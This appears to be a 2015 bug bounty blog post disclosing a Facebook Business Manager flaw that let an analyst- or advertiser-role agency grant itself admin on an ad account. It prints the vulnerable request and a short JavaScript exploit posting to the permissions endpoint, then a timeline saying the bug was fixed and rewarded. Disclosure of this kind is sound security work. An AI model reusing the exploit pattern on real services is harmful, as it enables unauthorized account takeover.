Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015


  1 comment

facebook exploit 2015





I discovered a vulnerability in Facebook that allowed a normal user in ad account to get unauthorized admin access in that ad account

admins in ad account  can add any user to their ad account with these 3 type of  role :

  1. admin
  2. advertiser
  3. analyst
read more about these roles link

Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from business.facebook.com

in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)


the vulnerability that I found, allow these agencies with normal role(2,3)  change their own access to admin!

Scenario :


I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!



Details:


with analyst permission in any ad account send this request :

request url : facebook.com/ads/manage/settings/permissions/?action=add_user

request body :

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]

Exploit :


var Xhr;
Xhr = new XMLHttpRequest ();
Xhr.open("POST","/ads/manage/settings/permissions/?action=add_user",true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
p += "fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);
__ACCID__ = ad account id
__USERID__ = this user will be new admin ;)
__PERM__ = permission (1001,1002,1003)

POC : 

 I removed some section that used userid or email





Timeline: 



  •  Mar 14, 2015 01:27am: Initial report
  •  Mar 17, 2015 03:35am: Bug acknowledged by security team
  •  Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability fixed
  •  Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with a $8000.




1 comment :